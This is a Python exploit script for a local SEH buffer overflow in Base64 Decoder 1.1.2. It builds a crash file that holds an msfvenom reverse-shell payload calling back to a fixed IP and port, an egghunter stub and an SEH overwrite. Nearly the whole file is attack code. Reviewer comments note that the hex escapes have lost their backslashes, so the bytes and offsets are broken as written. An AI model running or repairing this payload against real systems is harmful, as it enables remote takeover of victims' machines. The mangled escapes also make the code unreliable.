#!/usr/bin/env python

# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter
# Date: 28.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 7 Professional SP1 x86
# Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070

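# Assemble the crash file in the layout the header describes: a short prefix,
# the msfvenom payload prefixed with its "w00t" egg tag, padding out to the
# SEH offset, an egghunter stub, then the SEH overwrite.  Every value below is
# a fixed literal copied from the original advisory; nothing is read from the
# environment or from user input.
#
# NOTE(review): in this copy the backslash of every "\x" escape appears to have
# been stripped, so each "xNN" group is three plain ASCII characters rather
# than one byte.  The offsets below (490, 620) assume one byte per group and
# are not reached as written; "A" * n with negative n yields "" silently.
# The literals are left byte-identical here.
junk = "A" * 4

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b 'x00x0a'
# "w00tw00t" is the doubled egg tag the hunter stub below scans memory for;
# it is also the most recognisable string in the resulting crash.txt.
buf = "w00tw00t"
buf += "xbdx82x38x76xeaxd9xcdxd9x74x24xf4x58x2b"
buf += "xc9xb1x52x83xe8xfcx31x68x0ex03xeax36x94"
buf += "x1fx16xaexdaxe0xe6x2fxbbx69x03x1exfbx0e"
buf += "x40x31xcbx45x04xbexa0x08xbcx35xc4x84xb3"
buf += "xfex63xf3xfaxffxd8xc7x9dx83x22x14x7dxbd"
buf += "xecx69x7cxfax11x83x2cx53x5dx36xc0xd0x2b"
buf += "x8bx6bxaaxbax8bx88x7bxbcxbax1fxf7xe7x1c"
buf += "x9exd4x93x14xb8x39x99xefx33x89x55xeex95"
buf += "xc3x96x5dxd8xebx64x9fx1dxcbx96xeax57x2f"
buf += "x2axedxacx4dxf0x78x36xf5x73xdax92x07x57"
buf += "xbdx51x0bx1cxc9x3dx08xa3x1ex36x34x28xa1"
buf += "x98xbcx6ax86x3cxe4x29xa7x65x40x9fxd8x75"
buf += "x2bx40x7dxfexc6x95x0cx5dx8fx5ax3dx5dx4f"
buf += "xf5x36x2ex7dx5axedxb8xcdx13x2bx3fx31x0e"
buf += "x8bxafxccxb1xecxe6x0axe5xbcx90xbbx86x56"
buf += "x60x43x53xf8x30xebx0cxb9xe0x4bxfdx51xea"
buf += "x43x22x41x15x8ex4bxe8xecx59xb4x45xd6xf3"
buf += "x5cx94x26x15xc1x11xc0x7fxe9x77x5bxe8x90"
buf += "xddx17x89x5dxc8x52x89xd6xffxa3x44x1fx75"
buf += "xb7x31xefxc0xe5x94xf0xfex81x7bx62x65x51"
buf += "xf5x9fx32x06x52x51x4bxc2x4exc8xe5xf0x92"
buf += "x8cxcexb0x48x6dxd0x39x1cxc9xf6x29xd8xd2"
buf += "xb2x1dxb4x84x6cxcbx72x7fxdfxa5x2cx2cx89"
buf += "x21xa8x1ex0ax37xb5x4axfcxd7x04x23xb9xe8"
buf += "xa9xa3x4dx91xd7x53xb1x48x5cx63xf8xd0xf5"
buf += "xecxa5x81x47x71x56x7cx8bx8cxd5x74x74x6b"
buf += "xc5xfdx71x37x41xeex0bx28x24x10xbfx49x6d"

junk += buf
# print() with a single argument behaves the same under Python 2 and 3;
# the original used the Python 2 statement form, which is a SyntaxError on 3.
print("filling with " + str(490 - len(junk)))
# Pad to the first fixed offset; if junk is already longer the multiplier is
# negative and this appends nothing.
junk += "A" * (490 - len(junk))

# Short slide in front of the egghunter stub.
junk += "x90x90x90x90"
junk += "x90x90x90x90"

# msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b 'x00' -v egg
egg = ""
egg += "xb8x2ex04x6dx70xdbxd5xd9x74x24xf4x5ax2b"
egg += "xc9xb1x09x31x42x12x83xeaxfcx03x6cx0ax8f"
egg += "x85x16x93x85x99xd9xd1x4bx0cxe7x8dxa6xfe"
egg += "xdbx28x63x8bxccx8bxe4x43x22x98x83x73xed"
egg += "x15x7exd4x84x32x81xcc"
junk += egg

# Pad to the SEH record (same negative-multiplier caveat as above).
junk += "A" * (620 - len(junk))
# nSEH: short jump back over the record, then the SEH handler address.
junk += "xebx80x90x90"
# POP-POP-RET is on 0x00401414
junk += "x14x14x40"

# The original ended with `f.close` (attribute access, never called), so the
# file was only closed by interpreter shutdown.  The context manager flushes
# and closes deterministically.  The output artifact is crash.txt in the
# current directory.
with open("crash.txt", "w") as f:
    f.write(junk)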